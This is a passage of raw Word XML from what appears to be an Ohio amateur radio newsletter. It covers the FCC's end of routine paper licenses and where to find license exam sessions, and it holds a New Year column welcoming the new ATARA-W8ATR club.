          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>(By Anthony Luscre, K8ZT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9E2137" w14:textId="15A64082" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="00BE7112" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="136D3FC2" w14:textId="50FD0219" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="00BE7112" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">As of February 17, 2015, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>FCC no longer routinely issues paper license documents</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to Amateur Radio applicants and licensees. The Commission has maintained for some time now that the official Amateur Radio license authorization is the electronic record that exists in its Universal Licensing System (ULS). The FCC will continue to provide paper license documents to all licensees who notify the Commission that they prefer to receive one. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6133A3DB" w14:textId="77777777" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="00BE7112" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1521F31C" w14:textId="77777777" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="00BE7112" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Licensees also will be able to print out an official authorization — as well as an unofficial “reference copy” — from the ULS License Manager. I’ve created a set of instructions on how you can request an </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">“official” printed copy of your license*    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527837E3" w14:textId="77777777" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="00BE7112" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6904DA93" w14:textId="77777777" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="0084211F" w:rsidP="00C006F5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId189" w:history="1">
        <w:r w:rsidR="00BE7112" w:rsidRPr="00BE7112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Click here to download the instructions</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="69BDCCA3" w14:textId="589D410B" w:rsidR="00946F0D" w:rsidRDefault="00946F0D" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C88C75D" w14:textId="77777777" w:rsidR="0074102E" w:rsidRPr="008F653B" w:rsidRDefault="0084211F" w:rsidP="0074102E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0563C1" w:themeColor="hyperlink"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="TOP" w:history="1">
        <w:r w:rsidR="0074102E" w:rsidRPr="008F653B">
          <w:rPr>
            <w:color w:val="0563C1" w:themeColor="hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>TOP^</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:p w14:paraId="79C96267" w14:textId="77777777" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="00BE7112" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D9F1447" w14:textId="77777777" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="0084211F" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:pict w14:anchorId="74E395A7">
          <v:rect id="_x0000_i1091" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D893FF5" w14:textId="77777777" w:rsidR="00362A4A" w:rsidRDefault="00362A4A" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD9BC51" w14:textId="65454587" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="00BE7112" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:i/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252680192" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06CA9A53" wp14:editId="258F1854">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>53340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1021080" cy="1243965"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21170"/>
                <wp:lineTo x="21358" y="21170"/>
                <wp:lineTo x="21358" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>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test-taking.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId190" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm flipH="1">
                      <a:off x="0" y="0"/>
                      <a:ext cx="1021080" cy="1243965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>V.E. Test Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A1EB5" w14:textId="77777777" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="00BE7112" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25E088E4" w14:textId="5206E50E" w:rsidR="00D94DA4" w:rsidRDefault="00BE7112" w:rsidP="00C71F95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Many V.E.’s have decided to start testing once again, but with restrictions that need to be adhered to for sure. Here’s the link to find that V.E. Test session and what is expected of YOU before going.   </w:t>
      </w:r>
      <w:hyperlink r:id="rId191" w:history="1">
        <w:r w:rsidRPr="00BE7112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://www.arrl.org/find-an-amateur-radio-license-exam-session</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6C517C" w14:textId="265735CB" w:rsidR="00D94DA4" w:rsidRDefault="00D94DA4" w:rsidP="00C71F95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F0E7D3F" w14:textId="52E1160A" w:rsidR="00D0375C" w:rsidRDefault="00D0375C" w:rsidP="00D0375C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7072158F" w14:textId="11EBB62B" w:rsidR="00D91A53" w:rsidRPr="0008593B" w:rsidRDefault="0084211F" w:rsidP="00E7594D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:pict w14:anchorId="63694099">
          <v:rect id="_x0000_i1092" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E688A89" w14:textId="77777777" w:rsidR="000D384F" w:rsidRDefault="000D384F" w:rsidP="001C7797">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CD11744" w14:textId="77777777" w:rsidR="00362A4A" w:rsidRDefault="00362A4A" w:rsidP="001C7797">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B6EEE9D" w14:textId="77777777" w:rsidR="00362A4A" w:rsidRDefault="00362A4A" w:rsidP="001C7797">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239E9112" w14:textId="77777777" w:rsidR="00362A4A" w:rsidRDefault="00362A4A" w:rsidP="001C7797">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="711CA933" w14:textId="77777777" w:rsidR="00362A4A" w:rsidRDefault="00362A4A" w:rsidP="001C7797">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F296EA1" w14:textId="15301830" w:rsidR="001C7797" w:rsidRPr="001C7797" w:rsidRDefault="001C7797" w:rsidP="001C7797">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="final"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidRPr="001C7797">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="009778EE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>inal…  Final</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E1B788" w14:textId="77777777" w:rsidR="000B3C0B" w:rsidRDefault="000B3C0B" w:rsidP="000B3C0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3111E2A9" w14:textId="77777777" w:rsidR="00475888" w:rsidRDefault="00A529C9" w:rsidP="00475888">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037310B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252655616" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="42F46F48" wp14:editId="6E1CAF20">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1905000" cy="2540000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21384"/>
                <wp:lineTo x="21384" y="21384"/>
                <wp:lineTo x="21384" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>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1905000" cy="2540000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00475888">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">Here we go!  2021is in the check out lane.  Couldn’t make me happier. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D06F040" w14:textId="314A81E4" w:rsidR="00DB33B8" w:rsidRDefault="00475888" w:rsidP="00475888">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>2022 is picking up speed on the on-ramp</w:t>
      </w:r>
      <w:r w:rsidR="00DB33B8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>.  Can’t stand still, but it’s scary moving forward.  Let’s hope only good things happen this year to make up for the past two.</w:t>
      </w:r>
      <w:r w:rsidR="00D53069">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003565D1" w14:textId="77777777" w:rsidR="00DB33B8" w:rsidRDefault="00DB33B8" w:rsidP="00475888">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54C5263D" w14:textId="77777777" w:rsidR="00DB33B8" w:rsidRDefault="00DB33B8" w:rsidP="00475888">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>I’m going to jump into the new year thinking about Amateur Radio FUN!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AAB940" w14:textId="075C12B1" w:rsidR="00805766" w:rsidRDefault="00DB33B8" w:rsidP="00475888">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a great hobby with lots of fun stuff to do.  No excuses – make this your best year ever for Ham Radio.  The way you do that is by participating in the activities of Ham Radio -  check into your local nets, work some DX, activate some parks, islands, </w:t>
      </w:r>
      <w:r w:rsidR="00050611">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>counties</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">, rare grid squares, </w:t>
      </w:r>
      <w:r w:rsidR="00045D8B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00050611">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>learn (or re-learn morse code), build some projects, experiment with antennas, make some satellite contacts, run a special event station, participate in contests, improve your station and improve your skills.  I could go on for at least a page or two, but I think you get the idea!  (Seriously, I could.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7245B1DE" w14:textId="76C590DD" w:rsidR="00050611" w:rsidRDefault="00050611" w:rsidP="00475888">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="164C2648" w14:textId="62FCBD17" w:rsidR="008C4C07" w:rsidRDefault="00050611" w:rsidP="004E2260">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>You might think to yourself, I’m just a new ham, a young ham, an old ham -whatever.  The best way to get involved with all of these activities is to do it with a grou</w:t>
      </w:r>
      <w:r w:rsidR="00D53069">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">p.  A club.  As you gain knowledge and move forward in the hobby you will be able to do more on your own, while at the same time becoming more valuable to the group by being able to share your experience.  Being sheltered here in NE Portage County for the past too many years, I really didn’t think you could do any better than my home club – PCARS.  If there’s one thing I’ve learned </w:t>
      </w:r>
      <w:r w:rsidR="00B7564B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>since getting involved with the Ohio Section, it’s that there are a lot or really good clubs to choose from in the Ohio Section.  In fact, you might want to belong to more than one club.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EEF7E5" w14:textId="2EA8CC2E" w:rsidR="00B7564B" w:rsidRDefault="00B7564B" w:rsidP="004E2260">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CADDF33" w14:textId="665399C5" w:rsidR="00B7564B" w:rsidRDefault="00B7564B" w:rsidP="004E2260">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>As we move into 2022 I’ll be promoting Amateur Radio Fun – but especially as it occurs in the club environment.  With that, I want to welcome a new club into the Ohio Section:</w:t>
      </w:r>
      <w:r w:rsidR="004F4AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">  ATARA-W8ATR – All Things Amateur Radio Association.  From Jarrod – KE8</w:t>
      </w:r>
      <w:r w:rsidR="002F2055">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>MBL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EA8AA1" w14:textId="44D52F36" w:rsidR="004F4AC0" w:rsidRDefault="004F4AC0" w:rsidP="004E2260">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69BBD498" w14:textId="77777777" w:rsidR="004F4AC0" w:rsidRPr="004F4AC0" w:rsidRDefault="004F4AC0" w:rsidP="004F4AC0">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>All things Amateur Radio Association (ATARA) W8ATR is a brand new ARRL affiliated club started in June of 2021. ATARA is a family-oriented radio club set in the foothills of Southern Ohio. Our mission is to have fun with all aspects and modes of operation for amateur radio. Current club members enjoy things such as DX-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F4AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F4AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, contesting, off-grid operations, project builds, etc.; but we welcome you to bring new knowledge to our club and share it with us.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D7C2CD" w14:textId="77777777" w:rsidR="004F4AC0" w:rsidRPr="004F4AC0" w:rsidRDefault="004F4AC0" w:rsidP="004F4AC0">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Our Off-Grid Radio Team is an integral part of the ATARA club and continually strives to reach for and maintain a state of readiness for emergency communication service. Our Off-Grid Radio Team is organized into small units, all training together as a cohesive larger unit year-round; thus, becoming proficient in the use of our personal equipment, building and refining systems, honing skillsets, all while developing relationships and camaraderie among like-minded radio operators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21592EC8" w14:textId="77777777" w:rsidR="004F4AC0" w:rsidRPr="004F4AC0" w:rsidRDefault="004F4AC0" w:rsidP="004F4AC0">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ATARA is focused on giving back to our community. We do this through volunteering for events and supporting youth educational efforts such as our local after school program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75646F3E" w14:textId="77777777" w:rsidR="004F4AC0" w:rsidRPr="004F4AC0" w:rsidRDefault="004F4AC0" w:rsidP="004F4AC0">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Check us out at </w:t>
      </w:r>
      <w:hyperlink r:id="rId193" w:history="1">
        <w:r w:rsidRPr="004F4AC0">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://atara-w8atr.fun</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="290C8D65" w14:textId="77777777" w:rsidR="004F4AC0" w:rsidRPr="004F4AC0" w:rsidRDefault="004F4AC0" w:rsidP="004F4AC0">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="563DBDEB" wp14:editId="19ABD350">
            <wp:extent cx="800100" cy="1171575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="37" name="Picture 37"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picture containing diagram&#10;&#10;Description automatically generated"/>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800100" cy="1171575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
